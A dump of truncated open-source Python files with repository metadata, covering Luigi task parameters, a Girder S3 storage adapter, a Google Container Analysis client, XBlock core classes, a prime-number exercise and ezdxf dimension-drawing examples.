validator(value, module)
return value
def map_params_to_obj(module):
aggregate = module.params['aggregate']
if not ag
|
nagyistoce/devide
|
modules/vtk_basic/vtkRecursiveDividingCubes.py
|
Python
|
bsd-3-clause
| 506
| 0.001976
|
# class generated by DeVIDE::createDeVIDEModuleFromVTKObject
from module_kits.vtk_kit.mixins import SimpleVTKClassModuleBase
import vtk
class vtkRecursiveDividingCubes(SimpleVTKClassModuleBase):
def __init__(self, module_manager):
SimpleVTKClassModuleBase.__init__(
self, module_manager,
vtk.vtkRecursiveDividingCubes(), 'Processing.',
('vtkImageData',), ('vtkPolyData',),
replaceDoc=True,
inputFunctions=None, outputFunctions=None)
|
linearregression/luigi
|
luigi/parameter.py
|
Python
|
apache-2.0
| 20,682
| 0.003771
|
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
''' Parameters are one of the core concepts of Luigi.
All Parameters sit on :class:`~luigi.task.Task` classes.
See :ref:`Parameter` for more info on how to define parameters.
'''
import datetime
import warnings
try:
from ConfigParser import NoOptionError, NoSectionError
except ImportError:
from configparser import NoOptionError, NoSectionError
from luigi import six
from luigi import configuration
from luigi.deprecate_kwarg import deprecate_kwarg
_no_value = object()
class ParameterException(Exception):
"""
Base exception.
"""
pass
class MissingParameterException(ParameterException):
"""
Exception signifying that there was a missing Parameter.
"""
pass
class UnknownParameterException(ParameterException):
"""
Exception signifying that an unknown Parameter was supplied.
"""
pass
class DuplicateParameterException(ParameterException):
"""
Exception signifying that a Parameter was specified multiple times.
"""
pass
class UnknownConfigException(ParameterException):
"""
Exception signifying that the ``config_path`` for the Parameter could not be found.
"""
pass
class Parameter(object):
"""
An untyped Parameter
Parameters are objects set on the Task class level to make it possible to parameterize tasks.
For instance:
class MyTask(luigi.Task):
foo = luigi.Parameter()
This makes it possible to instantiate multiple tasks, eg ``MyTask(foo='bar')`` and
``MyTask(foo='baz')``. The task will then have the ``foo`` attribute set appropriately.
There are subclasses of ``Parameter`` that define what type the parameter has. This is not
enforced within Python, but are used for command line interaction.
When a task is instantiated, it will first use any argument as the value of the parameter, eg.
if you instantiate a = TaskA(x=44) then a.x == 44. If this does not exist, it will use the value
of the Parameter object, which is defined on a class level. This will be resolved in this
order of falling priority:
* Any value provided on the command line on the class level (eg. ``--TaskA-param xyz``)
* Any value provided via config (using the ``config_path`` argument)
* Any default value set using the ``default`` flag.
"""
counter = 0
"""non-atomically increasing counter used for ordering parameters."""
@deprecate_kwarg('is_boolean', 'is_bool', False)
def __init__(self, default=_no_value, is_list=False, is_boolean=False, is_global=False, significant=True, description=None,
config_path=None, positional=True):
"""
:param default: the default value for this parameter. This should match the type of the
Parameter, i.e. ``datetime.date`` for ``DateParameter`` or ``int`` for
``IntParameter``. By default, no default is stored and
the value must be specified at runtime.
:param bool is_list: specify ``True`` if the parameter should allow a list of values rather
than a single value. Default: ``False``. A list has an implicit default
value of ``[]``.
    :param bool is_bool: specify ``True`` if the parameter is a bool value. Default:
``False``. Bool's have an implicit default value of ``False``.
:param bool significant: specify ``False`` if the parameter should not be treated as part of
the unique identifier for a Task. An insignificant Parameter might
also be used to specify a password or other sensitive information
that should not be made public via the scheduler. Default:
``True``.
:param str description: A human-readable string describing the purpose of this Parameter.
For command-line invocations, this will be used as the `help` string
shown to users. Default: ``None``.
:param dict config_path: a dictionary with entries ``section`` and ``name``
specifying a config file entry from which to read the
default value for this parameter. DEPRECATED.
Default: ``None``.
:param bool positional: If true, you can set the argument as a
positional argument. Generally we recommend ``positional=False``
as positional arguments become very tricky when
you have inheritance and whatnot.
"""
# The default default is no default
self.__default = default
self.__global = _no_value
self.is_list = is_list
self.is_bool = is_boolean and not is_list # Only BoolParameter should ever use this. TODO(erikbern): should we raise some kind of exception?
if is_global:
warnings.warn("is_global support is removed. Assuming positional=False",
DeprecationWarning,
stacklevel=2)
positional = False
self.significant = significant # Whether different values for this parameter will differentiate otherwise equal tasks
self.positional = positional
self.description = description
if config_path is not None and ('section' not in config_path or 'name' not in config_path):
raise ParameterException('config_path must be a hash containing entries for section and name')
self.__config = config_path
self.counter = Parameter.counter # We need to keep track of this to get the order right (see Task class)
Parameter.counter += 1
def _get_value_from_config(self, section, name):
"""Loads the default from the config. Returns _no_value if it doesn't exist"""
conf = configuration.get_config()
try:
value = conf.get(section, name)
except (NoSectionError, NoOptionError):
return _no_value
if self.is_list:
return tuple(self.parse(p.strip()) for p in value.strip().split('\n'))
else:
return self.parse(value)
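    # Illustrative sketch (assumed config layout, not from the original
    # source): for an ``is_list`` IntParameter, a config value spanning three
    # lines, "1\n2\n3", parses to the tuple (1, 2, 3).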
def _get_value(self, task_name=None, param_name=None):
if self.__global != _no_value:
return self.__global
if task_name and param_name:
v = self._get_value_from_config(task_name, param_name)
if v != _no_value:
return v
v = self._get_value_from_config(task_name, param_name.replace('_', '-'))
if v != _no_value:
warnings.warn(
'The use of the configuration [%s] %s (with dashes) should be avoided. Please use underscores.' %
(task_name, param_name), DeprecationWarning, stacklevel=2)
return v
if self.__config:
v = self._get_value_from_config(self.__config['section'], self.__config['name'])
if v != _no_value and task_name and param_name:
warnings.warn(
'The use of the configuration [%s] %s is deprecated. Please use [%s] %s' %
(self.__config['section'], self.__config['name'], task_name, param_name),
DeprecationWarning, stacklevel=2)
if v != _no_value:
return v
if self.__default != _no_value:
return sel
|
essamjoubori/girder
|
girder/utility/s3_assetstore_adapter.py
|
Python
|
apache-2.0
| 29,780
| 0.000269
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright 2014 Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import boto
import boto.s3.connection
import cherrypy
import json
import re
import requests
import six
import uuid
from .abstract_assetstore_adapter import AbstractAssetstoreAdapter
from girder.models.model_base import ValidationException
from girder import logger, events
BUF_LEN = 65536 # Buffer size for download stream
boto.config.add_section('s3')
boto.config.set('s3', 'use-sigv4', 'True')
def authv4_determine_region_name(self, *args, **kwargs):
"""
The boto method auth.S3HmacAuthV4Handler.determine_region_name fails when
the url is an IP address or localhost. For testing, we need to have this
succeed. This wraps the boto function and, if it fails, adds a fall-back
value.
"""
try:
result = authv4_orig_determine_region_name(self, *args, **kwargs)
except UnboundLocalError:
result = 'us-east-1'
return result
def required_auth_capability_wrapper(fun):
def wrapper(self, *args, **kwargs):
if self.anon:
return ['anon']
else:
return fun(self, *args, **kwargs)
return wrapper
authv4_orig_determine_region_name = \
boto.auth.S3HmacAuthV4Handler.determine_region_name
boto.auth.S3HmacAuthV4Handler.determine_region_name = \
authv4_determine_region_name
boto.s3.connection.S3Connection._required_auth_capability = \
required_auth_capability_wrapper(
boto.s3.connection.S3Connection._required_auth_capability)
def _generate_url_sigv4(self, expires_in, method, bucket='', key='',
headers=None, response_headers=None, version_id=None,
iso_date=None, params=None):
"""
The version of this method in boto.s3.connection.S3Connection does not
support signing custom query parameters, which is necessary for presigning
multipart upload requests. This implementation does, but should go away
once https://github.com/boto/boto/pull/3322 is merged and released.
"""
path = self.calling_format.build_path_base(bucket, key)
auth_path = self.calling_format.build_auth_path(bucket, key)
host = self.calling_format.build_host(self.server_name(), bucket)
if host.endswith(':443'):
host = host[:-4]
if params is None:
params = {}
if version_id is not None:
params['VersionId'] = version_id
http_request = self.build_base_http_request(
method, path, auth_path, headers=headers, host=host, params=params)
return self._auth_handler.presign(http_request, expires_in,
iso_date=iso_date)
class S3AssetstoreAdapter(AbstractAssetstoreAdapter):
"""
This assetstore type stores files on S3. It is responsible for generating
HMAC-signed messages that authorize the client to communicate directly with
the S3 server where the files are stored.
"""
CHUNK_LEN = 1024 * 1024 * 32 # Chunk size for uploading
HMAC_TTL = 120 # Number of seconds each signed message is valid
@staticmethod
def validateInfo(doc):
"""
        Makes sure the bucket settings are valid and that the bucket is writeable.
"""
if 'prefix' not in doc:
doc['prefix'] = ''
# remove slashes from front and back of the prefix
doc['prefix'] = doc['prefix'].strip('/')
if not doc.get('bucket'):
raise ValidationException('Bucket must not be empty.', 'bucket')
if not doc.get('readOnly'):
if not doc.get('secret'):
raise ValidationException(
'Secret key must not be empty.', 'secret')
if not doc.get('accessKeyId'):
raise ValidationException(
'Access key ID must not be empty.', 'accessKeyId')
# construct a set of connection parameters based on the keys and the
# service
if 'service' not in doc:
doc['service'] = ''
if doc['service'] != '':
service = re.match("^((https?)://)?([^:/]+)(:([0-9]+))?$",
doc['service'])
if not service:
raise ValidationException(
                    'The service must be of the form [http[s]://](host domain)'
'[:(port)].', 'service')
doc['botoConnect'] = makeBotoConnectParams(
            doc['accessKeyId'], doc['secret'], doc['service'])
# Make sure we can write into the given bucket using boto
conn = botoConnectS3(doc['botoConnect'])
if doc.get('readOnly'):
try:
conn.get_bucket(bucket_name=doc['bucket'], validate=True)
except Exception:
logger.exception('S3 assetstore validation exception')
raise ValidationException('Unable to connect to bucket "%s".' %
doc['bucket'], 'bucket')
else:
try:
bucket = conn.get_bucket(bucket_name=doc['bucket'],
validate=True)
testKey = boto.s3.key.Key(
bucket=bucket, name='/'.join(
filter(None, (doc['prefix'], 'test'))))
testKey.set_contents_from_string('')
except Exception:
logger.exception('S3 assetstore validation exception')
raise ValidationException('Unable to write into bucket "%s".' %
doc['bucket'], 'bucket')
return doc
def __init__(self, assetstore):
"""
:param assetstore: The assetstore to act on.
"""
super(S3AssetstoreAdapter, self).__init__(assetstore)
if ('accessKeyId' in self.assetstore and 'secret' in self.assetstore and
'service' in self.assetstore):
self.assetstore['botoConnect'] = makeBotoConnectParams(
self.assetstore['accessKeyId'], self.assetstore['secret'],
self.assetstore['service'])
def _getRequestHeaders(self, upload):
return {
'Content-Disposition': 'attachment; filename="%s"' % upload['name'],
'Content-Type': upload.get('mimeType', ''),
'x-amz-acl': 'private',
'x-amz-meta-uploader-id': str(upload['userId']),
'x-amz-meta-uploader-ip': str(cherrypy.request.remote.ip)
}
def initUpload(self, upload):
"""
Build the request required to initiate an authorized upload to S3.
"""
if upload['size'] <= 0:
return upload
uid = uuid.uuid4().hex
key = '/'.join(filter(None, (self.assetstore.get('prefix', ''),
uid[0:2], uid[2:4], uid)))
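        # Illustrative sketch (hypothetical values): a uid of "3fa4..." with a
        # prefix of "data" yields the key "data/3f/a4/3fa4...", spreading
        # objects across two levels of pseudo-directories.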
path = '/%s/%s' % (self.assetstore['bucket'], key)
headers = self._getRequestHeaders(upload)
chunked = upload['size'] > self.CHUNK_LEN
upload['behavior'] = 's3'
upload['s3'] = {
'chunked': chunked,
'chunkLength': self.CHUNK_LEN,
'relpath': path,
'key': key
}
if chunked:
upload['s3']['request'] = {'method': 'POST'}
alsoSignHeaders = {}
queryParams = {'uploads': None}
else:
upload['s3']['request'] = {'method': 'PUT'}
alsoSignHeaders = {
'Content-Length': upload['size']
}
|
tseaver/google-cloud-python
|
containeranalysis/google/cloud/devtools/containeranalysis_v1/gapic/container_analysis_client.py
|
Python
|
apache-2.0
| 21,328
| 0.001688
|
# -*- coding: utf-8 -*-
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Accesses the google.devtools.containeranalysis.v1 ContainerAnalysis API."""
import pkg_resources
import warnings
from google.oauth2 import service_account
import google.api_core.client_options
import google.api_core.gapic_v1.client_info
import google.api_core.gapic_v1.config
import google.api_core.gapic_v1.method
import google.api_core.gapic_v1.routing_header
import google.api_core.grpc_helpers
import google.api_core.path_template
import grpc
from google.cloud.devtools.containeranalysis_v1.gapic import (
container_analysis_client_config,
)
from google.cloud.devtools.containeranalysis_v1.gapic.transports import (
container_analysis_grpc_transport,
)
from google.cloud.devtools.containeranalysis_v1.proto import containeranalysis_pb2_grpc
from google.iam.v1 import iam_policy_pb2
from google.iam.v1 import options_pb2
from google.iam.v1 import policy_pb2
from grafeas import grafeas_v1
from grafeas.grafeas_v1.gapic.transports import grafeas_grpc_transport
_GAPIC_LIBRARY_VERSION = pkg_resources.get_distribution(
"google-cloud-containeranalysis"
).version
class ContainerAnalysisClient(object):
"""
Retrieves analysis results of Cloud components such as Docker container
images. The Container Analysis API is an implementation of the
`Grafeas <https://grafeas.io>`__ API.
Analysis results are stored as a series of occurrences. An
``Occurrence`` contains information about a specific analysis instance
on a resource. An occurrence refers to a ``Note``. A note contains
details describing the analysis and is generally stored in a separate
project, called a ``Provider``. Multiple occurrences can refer to the
same note.
For example, an SSL vulnerability could affect multiple images. In this
case, there would be one note for the vulnerability and an occurrence
for each image with the vulnerability referring to that note.
"""
SERVICE_ADDRESS = "containeranalysis.googleapis.com:443"
"""The default address of the service."""
# The name of the interface for this client. This is the key used to
# find the method configuration in the client_config dictionary.
_INTERFACE_NAME = "google.devtools.containeranalysis.v1.ContainerAnalysis"
@classmethod
def from_service_account_file(cls, filename, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
ContainerAnalysisClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
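    # Illustrative usage (hypothetical path, not from the original source):
    #   client = ContainerAnalysisClient.from_service_account_file(
    #       "/path/to/service-account.json")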
@classmethod
def note_path(cls, project, note):
"""Return a fully-qualified note string."""
return google.api_core.path_template.expand(
"projects/{project}/notes/{note}", project=project, note=note
)
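    # Illustrative sketch (hypothetical values):
    #   ContainerAnalysisClient.note_path("my-proj", "my-note")
    #   -> "projects/my-proj/notes/my-note"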
@classmethod
def occurrence_path(cls, project, occurrence):
"""Return a fully-qualified occurrence string."""
return google.api_core.path_template.expand(
"projects/{project}/occurrences/{occurrence}",
project=project,
occurrence=occurrence,
)
def __init__(
self,
transport=None,
channel=None,
credentials=None,
client_config=None,
client_info=None,
client_options=None,
):
"""Constructor.
Args:
transport (Union[~.ContainerAnalysisGrpcTransport,
Callable[[~.Credentials, type], ~.ContainerAnalysisGrpcTransport]): A transport
instance, responsible for actually making the API calls.
The default transport uses the gRPC protocol.
This argument may also be a callable which returns a
transport instance. Callables will be sent the credentials
as the first argument and the default transport class as
the second argument.
channel (grpc.Channel): DEPRECATED. A ``Channel`` instance
through which to make calls. This argument is mutually exclusive
with ``credentials``; providing both will raise an exception.
credentials (google.auth.credentials.Credentials): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is mutually exclusive with providing a
transport instance to ``transport``; doing so will raise
an exception.
client_config (dict): DEPRECATED. A dictionary of call options for
each method. If not specified, the default configuration is used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
client_options (Union[dict, google.api_core.client_options.ClientOptions]):
Client options used to set user options on the client. API Endpoint
should be set through client_options.
"""
# Raise deprecation warnings for things we want to go away.
if client_config is not None:
warnings.warn(
"The `client_config` argument is deprecated.",
PendingDeprecationWarning,
stacklevel=2,
)
else:
client_config = container_analysis_client_config.config
if channel:
warnings.warn(
"The `channel` argument is deprecated; use " "`transport` instead.",
PendingDeprecationWarning,
stacklevel=2,
)
api_endpoint = self.SERVICE_ADDRESS
if client_options:
if type(client_options) == dict:
client_options = google.api_core.client_options.from_dict(
client_options
)
if client_options.api_endpoint:
api_endpoint = client_options.api_endpoint
# Instantiate the transport.
# The transport is responsible for handling serialization and
# deserialization and actually sending data to the service.
if transport:
if callable(transport):
self.transport = transport(
credentials=credentials,
default_class=container_analysis_grpc_transport.ContainerAnalysisGrpcTransport,
address=api_endpoint,
)
else:
if credentials:
raise ValueError(
"Received both a transport instance and "
"credentials; these are mutually exclusive."
)
self.transport = transport
else:
self.transport = container_analysis
|
nagyistoce/edx-XBlock
|
xblock/core.py
|
Python
|
apache-2.0
| 9,923
| 0.002721
|
"""
Core classes for the XBlock family.
This code is in the Runtime layer, because it is authored once by edX
and used by all runtimes.
"""
import inspect
import pkg_resources
import warnings
from collections import defaultdict
from xblock.exceptions import DisallowedFileError
from xblock.fields import String, List, Scope
from xblock.internal import class_lazy
import xblock.mixins
from xblock.mixins import (
ScopedStorageMixin,
HierarchyMixin,
RuntimeServicesMixin,
HandlersMixin,
XmlSerializationMixin,
IndexInfoMixin,
ViewsMixin,
)
from xblock.plugin import Plugin
from xblock.validation import Validation
# exposing XML_NAMESPACES as a member of core, in order to avoid importing mixins where
# XML_NAMESPACES are needed (e.g. runtime.py).
XML_NAMESPACES = xblock.mixins.XML_NAMESPACES
# __all__ controls what classes end up in the docs.
__all__ = ['XBlock']
UNSET = object()
class XBlockMixin(ScopedStorageMixin):
"""
Base class for XBlock Mixin classes.
XBlockMixin classes can add new fields and new properties to all XBlocks
created by a particular runtime.
"""
pass
class SharedBlockBase(Plugin):
"""
Behaviors and attrs which all XBlock like things should share
"""
@classmethod
def open_local_resource(cls, uri):
"""Open a local resource.
The container calls this method when it receives a request for a
resource on a URL which was generated by Runtime.local_resource_url().
It will pass the URI from the original call to local_resource_url()
back to this method. The XBlock must parse this URI and return an open
file-like object for the resource.
For security reasons, the default implementation will return only a
very restricted set of file types, which must be located in a folder
called "public". XBlock authors who want to override this behavior will
need to take care to ensure that the method only serves legitimate
public resources. At the least, the URI should be matched against a
whitelist regex to ensure that you do not serve an unauthorized
resource.
"""
# Verify the URI is in whitelisted form before opening for serving.
# URI must begin with public/, and no file path component can start
# with a dot, which prevents ".." and ".hidden" files.
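        # Illustrative examples (hypothetical URIs, not from the original
        # source):
        #   "public/js/widget.js"  -> served
        #   "private/secrets.txt"  -> DisallowedFileError (not under public/)
        #   "public/../setup.py"   -> DisallowedFileError ("/." in the URI)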
if not uri.startswith("public/"):
raise DisallowedFileError("Only files from public/ are allowed: %r" % uri)
if "/." in uri:
raise DisallowedFileError("Only safe file names are allowed: %r" % uri)
return pkg_resources.resource_stream(cls.__module__, uri)
# -- Base Block
class XBlock(XmlSerializationMixin, HierarchyMixin, ScopedStorageMixin, RuntimeServicesMixin, HandlersMixin,
IndexInfoMixin, ViewsMixin, SharedBlockBase):
"""Base class for XBlocks.
Derive from this class to create a new kind of XBlock. There are no
required methods, but you will probably need at least one view.
Don't provide the ``__init__`` method when deriving from this class.
"""
entry_point = 'xblock.v1'
name = String(help="Short name for the block", scope=Scope.settings)
tags = List(help="Tags for this block", scope=Scope.settings)
@class_lazy
def _class_tags(cls): # pylint: disable=no-self-argument
"""
Collect the tags from all base classes.
"""
class_tags = set()
for base in cls.mro()[1:]: # pylint: disable=no-member
class_tags.update(getattr(base, '_class_tags', set()))
return class_tags
@staticmethod
def tag(tags):
"""Returns a function that adds the words in `tags` as class tags to this class."""
def dec(cls):
"""Add the words in `tags` as class tags to this class."""
# Add in this class's tags
cls._class_tags.update(tags.replace(",", " ").split()) # pylint: disable=protected-access
return cls
return dec
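    # Illustrative sketch (hypothetical block): decorating a class with
    # @XBlock.tag("poll, survey") adds both words to its _class_tags, so
    # XBlock.load_tagged_classes("poll") would yield it as a (name, class) pair.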
@classmethod
def load_tagged_classes(cls, tag, fail_silently=True):
"""
Produce a sequence of all XBlock classes tagged with `tag`.
fail_silently causes the code to simply log warnings if a
plugin cannot import. The goal is to be able to use part of
libraries from an XBlock (and thus have it installed), even if
the overall XBlock cannot be used (e.g. depends on Django in a
        non-Django application). There is disagreement about whether
this is a good idea, or whether we should see failures early
(e.g. on startup or first page load), and in what
contexts. Hence, the flag.
"""
# Allow this method to access the `_class_tags`
# pylint: disable=W0212
for name, class_ in cls.load_classes(fail_silently):
if tag in class_._class_tags:
yield name, class_
def __init__(self, runtime, field_data=None, scope_ids=UNSET, *args, **kwargs):
"""
Construct a new XBlock.
This class should only be instantiated by runtimes.
Arguments:
runtime (:class:`.Runtime`): Use it to access the environment.
It is available in XBlock code as ``self.runtime``.
field_data (:class:`.FieldData`): Interface used by the XBlock
fields to access their data from wherever it is persisted.
Deprecated.
scope_ids (:class:`.ScopeIds`): Identifiers needed to resolve
scopes.
"""
if scope_ids is UNSET:
raise TypeError('scope_ids are required')
# Provide backwards compatibility for external access through _field_data
super(XBlock, self).__init__(runtime=runtime, scope_ids=scope_ids, field_data=field_data, *args, **kwargs)
def render(self, view, context=None):
"""Render `view` with this block's runtime and the supplied `context`"""
return self.runtime.render(self, view, context)
def validate(self):
"""
Ask this xblock to validate itself. Subclasses are expected to override this
method, as there is currently only a no-op implementation. Any overriding method
should call super to collect validation results from its superclasses, and then
add any additional results as necessary.
"""
return Validation(self.scope_ids.usage_id)
class XBlockAside(XmlSerializationMixin, ScopedStorageMixin, RuntimeServicesMixin, HandlersMixin, SharedBlockBase):
"""
This mixin allows Xblock-like class to declare that it provides aside functionality.
"""
entry_point = "xblock_asides.v1"
@classmethod
def aside_for(cls, view_name):
"""
A decorator to indicate a function is the aside view for the given view_name.
Aside views should have a signature like:
@XBlockAside.aside_for('student_view')
def student_aside(self, block, context=None):
...
return Fragment(...)
"""
# pylint: disable=protected-access
def _decorator(func): # pylint: disable=missing-docstring
if not hasattr(func, '_aside_for'):
func._aside_for = []
func._aside_for.append(view_name) # pylint: disable=protected-access
return func
return _decorator
@class_lazy
def _combined_asides(cls): # pylint: disable=no-self-argument
"""
A dictionary mapping XBlock view names to the aside method that
decorates them (or None, if there is no decorator for the specified view).
"""
# The method declares what views it decorates. We rely on `dir`
# to handle subclasses and overrides.
combined_asides = defaultdict(None)
for _view_name, view_func in inspect.getmembers(cls, lambda attr: hasattr(attr, '_aside_for')):
aside_for = getattr(view_func, '_aside_for', [])
for view in aside_for:
combined_asides[view] = view_func.__name__
return combined_asides
def aside_vie
|
razzius/PyClassLessons
|
instructors/course-2015/errors_and_introspection/project/primetester3.py
|
Python
|
mit
| 969
| 0.004128
|
"""
For any given number, we only need to test the primes below it.
e.g. 9 -- we need only test 2,3,5,7
e.g. 8 -- we need only test 2,3,5,7
for example, the number 12 has factors 1,2,3,4,6,12.
We could find the six factor but we will find the two factor first.
The definition of a composite number is that it is composed of primes, therefore
it will always have a prime as a factor.
This prime test should have an index of all primes below i.
"""
total_range = 1000000
primes = list()
def prime_test(i):
"""
Cases:
Return False if i is not prime
Return True if i is prime
Caveat: cannot test 1.
Caveat 2: Cannot test 2.
It is fortuitous that these tests both return true.
"""
for possible_factor in primes:
if i % possible_factor == 0:
return False
return True
for prime in range(2,total_range):
is_prime = prime_test(prime)
if is_prime:
primes.append(prime)
print(len(primes))
|
ProfessorX/Config
|
.PyCharm30/system/python_stubs/-1247972723/gio/_gio/FileMonitorEvent.py
|
Python
|
gpl-2.0
| 785
| 0.007643
|
# encoding: utf-8
# module gio._gio
# from /usr/lib/python2.7/dist-packages/gtk-2.0/gio/_gio.so
# by generator 1.135
# no doc
# imports
import gio as __gio
import glib as __glib
import gobject as __gobject
import gobject._gobject as __gobject__gobject
class FileMonitorEvent(__gobject.GEnum):
# no doc
def __init__(self, *args, **kwargs): # real signature unknown
pass
__weakref__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""list of weak references to the object (if defined)"""
__dict__ = None # (!) real value is ''
__enum_values__ = {
0: 0,
1: 1,
2: 2,
3: 3,
4: 4,
5: 5,
6: 6,
7: 7,
}
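    # For reference (an assumption based on GIO's GFileMonitorEvent ordering,
    # not part of the generated stub): 0=CHANGED, 1=CHANGES_DONE_HINT,
    # 2=DELETED, 3=CREATED, 4=ATTRIBUTE_CHANGED, 5=PRE_UNMOUNT, 6=UNMOUNTED,
    # 7=MOVED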
__gtype__ = None # (!) real value is ''
|
mozman/ezdxf
|
examples/render/dimension_linear.py
|
Python
|
mit
| 24,851
| 0.000563
|
# Purpose: using DIMENSION horizontal, vertical and rotated
# Copyright (c) 2018-2021, Manfred Moitzi
# License: MIT License
from typing import cast
import math
import pathlib
import random
import logging
import ezdxf
from ezdxf.tools.standards import setup_dimstyle
from ezdxf.math import Vec3, UCS
from ezdxf.entities import DimStyle
from ezdxf.enums import MTextLineAlignment
# ========================================
# Setup logging
# ========================================
logging.basicConfig(level="WARNING")
# ========================================
# Setup your preferred output directory
# ========================================
OUTDIR = pathlib.Path("~/Desktop/Outbox").expanduser()
if not OUTDIR.exists():
OUTDIR = pathlib.Path()
# ========================================
# Default text attributes
# ========================================
TEXT_ATTRIBS = {
"height": 0.25,
"style": ezdxf.options.default_dimension_text_style,
}
DIM_TEXT_STYLE = ezdxf.options.default_dimension_text_style
# =======================================================
# Discarding dimension rendering is possible
# for BricsCAD, but is incompatible to AutoCAD -> error
# =======================================================
BRICSCAD = False
def set_text_style(doc, textstyle=DIM_TEXT_STYLE, name="EZDXF"):
if doc.dxfversion == "AC1009":
return
dimstyle = cast(DimStyle, doc.dimstyles.get(name))
dimstyle.dxf.dimtxsty = textstyle
def linear_tutorial(dxfversion="R12"):
doc = ezdxf.new(dxfversion, setup=True)
msp = doc.modelspace()
msp.add_line((0, 0), (3, 0))
msp.add_line((0, 7), (10, 0))
# horizontal DIMENSION
# Default DimStyle EZDXF:
# 1 drawing unit == 1m;
# scale 1: 100;
# length_factor=100 -> measurement in cm
#
# base: defines the dimension line, ezdxf accepts any point on the
# dimension line
# p1: defines the start point of the first extension line, which also
# defines the first point to measure
# p2: defines the start point of the second extension line, which also
# defines the second point to measure
dim = msp.add_linear_dim(
base=(3, 2),
p1=(0, 0),
p2=(3, 0),
dimstyle="EZDXF",
override={"dimtxsty": "OpenSans"},
)
# Necessary second step, to create the BLOCK entity with the DIMENSION
# geometry.
# Ezdxf supports DXF R2000 attributes for DXF R12 rendering, but they have
    # to be applied by the DIMSTYLE override feature; these additional attributes
    # are not stored in the XDATA section of the DIMENSION entity, they are just
# used to render the DIMENSION entity.
# The return value `dim` is not a DIMENSION entity, instead a
# DimStyleOverride object is returned, the DIMENSION entity is stored as
# dim.dimension, see also ezdxf.override.DimStyleOverride class.
dim.render()
# rotated DIMENSION without `override` uses ezdxf.options.default_dimension_text_style
# (OpenSansCondensed-Light)
# angle: defines the angle of the dimension line in relation to the x-axis
# of the WCS or UCS, measurement is the
# distance between first and second measurement point in direction of `angle`
dim2 = msp.add_linear_dim(
base=(10, 2),
p1=(7, 0),
p2=(10, 0),
angle=-30,
dimstyle="EZDXF",
override={
"dimdle": 0,
"dimdec": 2,
"dimtfill": 2, # custom text fill
"dimtfillclr": 4, # cyan
},
)
# Some properties have setter methods for convenience, this is also the
# reason for not calling dim2.render() automatically.
dim2.set_arrows(blk=ezdxf.ARROWS.closed_filled, size=0.25)
dim2.set_text_align(halign="right")
dim2.render()
doc.set_modelspace_vport(height=5, center=(5, 0))
doc.saveas(OUTDIR / f"dim_linear_{dxfversion}_tutorial.dxf")
def example_background_fill(dxfversion="R12"):
"""This example shows the background fill feature, ezdxf uses MTEXT for this
feature and has no effect in DXF R12.
"""
doc = ezdxf.new(dxfversion, setup=True)
msp = doc.modelspace()
msp.add_line((0, 2.2), (10, 2.2))
dim = msp.add_linear_dim(
base=(0, 2),
p1=(0, 0),
p2=(3, 0),
dimstyle="EZDXF",
override={
"dimtfill": 1, # background color
},
)
dim.set_text("bgcolor")
dim.render()
dim = msp.add_linear_dim(
base=(0, 2),
p1=(5, 0),
p2=(8, 0),
dimstyle="EZDXF",
override={
"dimtfill": 2, # custom text fill
"dimtfillclr": 4, # cyan
},
)
dim.set_text("cyan")
dim.render()
doc.saveas(OUTDIR / f"background_fill_example_{dxfversion}.dxf")
def example_for_all_text_placings_R12():
doc = ezdxf.new("R12", setup=True)
example_for_all_text_placings(doc, "dim_linear_text_placing_R12.dxf")
def example_for_all_text_placings_ucs_R12():
ucs = UCS(origin=(10, 10, 0), ux=(3, 1, 0), uz=(0, 0, 1))
doc = ezdxf.new("R12", setup=True)
example_for_all_text_placings(
doc, "dim_linear_text_placing_ucs_R12.dxf", ucs
)
def example_for_all_text_placings_in_space_R12():
ucs = UCS(ux=(1, 1, 0), uy=(0, 0, 1))
doc = ezdxf.new("R12", setup=True)
example_for_all_text_placings(
doc, "dim_linear_text_placing_in_space_R12.dxf", ucs
)
def example_for_all_text_placings_R2007():
doc = ezdxf.new("R2007", setup=True)
set_text_style(doc)
example_for_all_text_placings(doc, "dim_linear_text_placing_R2007.dxf")
def example_for_all_text_placings_ucs_R2007():
ucs = UCS(origin=(10, 10, 0), ux=(3, 1, 0), uz=(0, 0, 1))
doc = ezdxf.new("R2007", setup=True)
set_text_style(doc)
example_for_all_text_placings(
doc, "dim_linear_text_placing_ucs_R2007.dxf", ucs
)
def example_for_all_text_placings_in_space_R2007():
ucs = (
UCS(origin=(20, 20, 0))
.rotate_local_x(math.radians(45))
.rotate_local_z(math.radians(45))
)
doc = ezdxf.new("R2007", setup=True)
set_text_style(doc)
